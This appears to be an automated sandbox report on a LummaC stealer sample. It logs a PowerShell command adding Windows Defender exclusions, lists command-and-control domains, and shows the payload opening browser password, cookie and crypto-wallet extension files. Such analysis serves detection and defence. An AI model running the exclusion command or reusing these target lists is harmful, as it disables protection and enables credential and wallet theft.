Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Lipras
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Lipras Jump to behavior
LummaC encrypted strings found
Source: pdf.exe String found in binary or memory: servicedny.site
Source: pdf.exe String found in binary or memory: authorisev.site
Source: pdf.exe String found in binary or memory: faulteyotk.site
Source: pdf.exe String found in binary or memory: dilemmadu.site
Source: pdf.exe String found in binary or memory: contemteny.site
Source: pdf.exe String found in binary or memory: goalyfeastz.site
Source: pdf.exe String found in binary or memory: opposezmny.site
Source: pdf.exe String found in binary or memory: seallysl.site
Source: pdf.exe String found in binary or memory: ponintnykqwm.shop
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Lipras\pdf.exe "C:\Lipras\pdf.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Lipras Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Lipras\pdf.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: pdf.exe, 00000007.00000003.2111218031.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2180058428.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111335907.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111066004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: pdf.exe, 00000007.00000003.2101548903.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101608351.00000000008CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Lipras\pdf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: pdf.exe, 00000007.00000003.2052878859.00000000008B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
Source: pdf.exe, 00000007.00000003.2101785067.00000000008B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\w
Source: pdf.exe, 00000007.00000003.2052878859.00000000008B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Libertye
Source: pdf.exe, 00000007.00000003.2052878859.00000000008B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: pdf.exe, 00000007.00000003.2052896859.00000000008AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: powershell.exe, 00000002.00000002.1759697438.0000000006087000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
